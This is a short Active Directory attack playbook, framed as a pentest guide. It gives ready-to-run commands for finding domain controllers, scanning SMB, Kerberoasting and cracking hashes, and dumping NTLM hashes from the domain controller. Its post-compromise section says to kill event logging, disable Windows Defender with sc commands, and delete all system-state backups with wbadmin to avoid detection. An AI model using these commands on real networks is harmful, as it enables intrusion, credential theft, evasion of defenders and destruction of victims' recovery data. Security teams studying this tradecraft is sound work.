#
The Official phasetw0 Corporate Internal Active Directory Pentest Playbook and Knuckles
#
Written by hypervis0r
I'll be adding more to this as I own more domains lol
#
🔎 Initial Access
#
Identify Target Machines
Identify domain controllers on the network using DNS
# Linux
dig _ldap._tcp.dc._msdcs.EXAMPLE.COM -t any
dig _ldap._tcp.dc._msdcs.EXAMPLE.COM -t srv
# Windows
nslookup -type=any _ldap._tcp.dc._msdcs.EXAMPLE.COM
nslookup -type=srv _ldap._tcp.dc._msdcs.EXAMPLE.COMFind potential Windows machines using nmap along with the network subnet or the given scope of the pentest.
nmap -p139,445,88,135,389,464 <subnet here> -oG - | awk '/Up$/{print $2}' > windows_boxes.txt
#
Low hanging Fruit
Check Windows boxes for common CVEs (EternalBlue, other SMB vulns I can't think of, etc.)
# nmap scan
nmap -sC -sV -oN box_scan.txt -iL windows_boxes.txt
# crackmapexec scan
cme smb ~/windows_boxes.txt
#
Identify critical users
Nine times out of ten, network administrators of a company are admins on the internal domain. Look for staff directories for the company to find potential users to phish/brute-force.
# Google dork to find staff directory of company
site:"evil.corp" staff directory
#
🚩 Lateral movement (after found creds)
/*
TODO:
More AD Flaws (Golden Ticket)
LSSAS Dumping
*/Repeat these steps for every new better set of credentials you get, all the way until you get Local Admin or Domain Admin.
#
Check common Active Directory flaws
#
Kerberoasting/AS-REPRoasting
Check for users with associated SPNs using impacket's GetUserSPNs.py.
python3 GetUserSPNs.py evil.corp/user:pass -dc-ip dc1.evil.corp -outputfile hashes.tgtAfter gaining access to the TGT hashes, crack the user password using hashcat along with rockyou.txt and OneRuleToRuleThemAll.rule. This can take a while to crack, even on a powerful home PC. Unless you have a dedicated cracking machine, I recommend spinning up an Azure instance (specifically Standard NC6s_v3).
hashcat -m 13100 -w 4 -a 0 hashes.tgt rockyou.txt --rule OneRuleToRuleThemAll.ruleIf no hashes could be cracked, it is unlikely the password is brute-forcable, and you should move on.
#
Pop shell to investigate
Find machines you can potentially log into using your credentials. You can accomplish this using CrackMapExec along with the windows_boxes.txt list to scan every windows box, along with its SMB shares, with your creds.
# Check for shells
cme smb ~/windows_boxes.txt -u 'user' -p 'pass'
# Check for open SMB shares
cme smb ~/windows_boxes.txt -u 'user' -p 'pass' --sharesAfter you gain a shell (or find an interesting open share), look around for saved password files, ways to escalate to local admin, "goodies", etc.
#
🔥 Next steps after Domain Admin
#
OPSEC (These Steps are important!!!)
Kill the Windows Event Logging service using phant0m or some other method.
Disable the Windows Defender service, and look for any other EDRs to possibly disable before continuing.
# Stop the Windows Defender service, then disable it
sc stop "WinDefend"
sc config "WinDefend" start= disabled
#
Persistence
Run impacket's secretsdump.py to dump NTLM hashes from SAM, NTDS.DIT, and other hives.
python3 secretsdump.py evil.corp/Administrator:password@dc1.evil.corp
#
Check for backups
You wouldn't want to get discovered and risk a full wipe + backup, would you? If you are looking to make yourself at home for a long time, you may want to look for system backups and promptly destroy them.
# Delete all system state backups
wbadmin delete systemstatebackup -keepVersions:0
#
Enterprise Admin?
The domain you have just owned may have been a child domain of a larger parent domain. Exploit trust boundaries to gain Enterprise Admin, and own the whole tri-state area!
# Get list of domain trusts to find new DCs to own
nltest /domain_trusts
#
📕 References
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
https://github.com/SecureAuthCorp/impacket
https://github.com/byt3bl33d3r/CrackMapExec